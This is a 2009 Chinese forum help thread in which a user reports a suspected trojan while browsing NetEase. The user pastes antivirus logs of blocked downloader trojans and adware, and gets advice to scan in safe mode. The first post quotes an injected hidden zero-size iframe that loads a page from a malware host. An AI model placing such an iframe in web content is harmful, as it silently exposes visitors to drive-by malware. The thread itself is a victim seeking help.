1   1  /  1  页   跳转

[求助] 恶意木马程序

恶意木马程序







请各位帮我看一下,谢谢
网易是一个大站,难道网易也会中毒,这个是网易科技频道.
还有啊,就是网页那左上角会有一个小小的笑脸,暂且就称之为恶意的笑脸吧
请教下是我本机中毒,还是应该是网站中毒呢
我估计是风站有可能中毒了吧,
我百度了一下,发现这病毒最近几天比较流行的...

我查看了一下网页的原文件,有这样一行,第一行
<iframe src=http://qqqqkkkss.cn/4/xxx.htm width=0 height=0></iframe>-_-o   

yi 就这个,我怀疑和此有关此页面
年底了,病毒好逛

请大家能告诉我一下这个是怎么回事?,谢谢了

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)
分享到:
gototop
 

回复: 恶意木马程序



引用:
原帖由 帅哥阿福 于 2009-1-13 15:30:00 发表
楼主可否提供一下报毒的网址,我上了网易的科技板块,没有发现异常啊。
我的瑞星版本为:21.21.02


2009-1-14 9:53:54 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:44 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:43 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:38 文件系统实时防护 文件 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3G1I8TYA\Bf0yy[1].htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 尝试通过应用程序访问文件时发生事件: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:38 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:34 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:19 文件系统实时防护 文件 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3G1I8TYA\Bf0yy[1].htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 尝试通过应用程序访问文件时发生事件: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:19 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:11 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:53:01 文件系统实时防护 文件 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\23ZNRSHJ\Bf0yy[1].htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 尝试通过应用程序访问文件时发生事件: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:52:53 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:52:52 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:52:52 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:52:50 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:14:19 文件系统实时防护 文件 C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\A1ZHVKKE\Bf0yy[1].htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 尝试通过应用程序访问文件时发生事件: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:14:16 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:14:11 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:10:20 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-14 9:10:10 HTTP 过滤器 文件 http://qqqqkkkss.cn/4/Bf0yy.htm JS/TrojanDownloader.Agent.NJW 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-8 18:12:14 文件系统实时防护 文件 H:\.vbs VBS/Agent.AI 病毒 无法清除 NT AUTHORITY\SYSTEM 尝试通过应用程序访问文件时发生事件: C:\WINDOWS\explorer.exe.
2009-1-6 9:07:05 HTTP 过滤器 文件 http://www.phpwind.com/favicon.ico HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:52 HTTP 过滤器 文件 http://www.phpwind.com/favicon.ico HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:52 HTTP 过滤器 文件 http://www.phpwind.com/images/images/newsbg.gif HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:51 HTTP 过滤器 文件 http://www.phpwind.com/images/images/roadbg.gif HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:51 HTTP 过滤器 文件 http://www.phpwind.com/images/images st.gif HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:51 HTTP 过滤器 文件 http://www.phpwind.com/images/show_4.jpg HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2009-1-6 9:03:51 HTTP 过滤器 文件 http://www.phpwind.com/images/images/rssbg.gif HTML/TrojanDownloader.Agent.ML 特洛伊木马 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2008-12-17 10:40:50 文件系统实时防护 文件 C:\WINDOWS\Wisb\pbhealth.dll 可能是 Win32/Adware.Cinmus 应用程序 的变种 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\127.exe.
2008-12-17 10:40:48 文件系统实时防护 文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\127.exe 可能是 Win32/Adware.Cinmus 应用程序 的变种 无法清除 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\WINDOWS\system32\msn164.exe.
2008-12-17 10:40:48 文件系统实时防护 文件 C:\WINDOWS\system32\msn164.exe 可能是 Win32/Adware.Cinmus 应用程序 的变种 无法清除 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rar$EX00.515\msimect.exe.
2008-12-17 10:40:28 文件系统实时防护 文件 C:\WINDOWS\system32\setup_1027257.exe Win32/Agent.OCX 特洛伊木马 的变种 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rar$EX00.515\msimect.exe.
2008-12-17 10:40:22 文件系统实时防护 文件 C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rar$EX00.515\msimect.exe 多个威胁 无法清除 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\Program Files\WinRAR\WinRAR.exe.
2008-12-17 10:39:40 HTTP 过滤器 文件 http://dl-sh-ocn-1.pchome.net/03/2k/msimect.rar 多个威胁 连接中断 - 已隔离 XIAN\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.
2008-12-12 12:15:45 文件系统实时防护 文件 C:\Program Files\Nero\Nero ControlCenter\is-UCCIB.tmp 可能是 Win32/Delf 特洛伊木马 的变种 通过删除清除 - 已隔离 NT AUTHORITY\SYSTEM 在应用程序新建的文件上发生事件: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\is-7DBM5.tmp\Nero8.3.2.1.tmp.
2008-11-27 11:41:40 HTTP 过滤器 文件 http://download.bitrings.com/bitringsoft/SVC_060306.zip Win32/Adware.SeeCha 应用程序 连接中断 - 已隔离 CHINESE-610CE81\yyue 通过应用程序访问 web 时检测到威胁: D:\Program Files\Maxthon\Maxthon.exe.我郁闷了昨天加载项为realplayer的加载项,今天却变成了暴风网际科技的了
上面是扫描的日志

我估计和这人网址有关
http://qqqqkkkss.cn有关
我google了下,提示说这个网址是病毒网站来着
gototop
 

回复: 恶意木马程序



引用:
原帖由 东嬉南北 于 2009-1-14 10:20:00 发表
这种病毒是和lz本地的一个恶意程序有关的,这样的程序会在lz上的网页中注入语句,进而传播其他计算机,建议lz在安全模式下进行查杀病毒



谢谢我知道怎么做了
very very 感谢
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT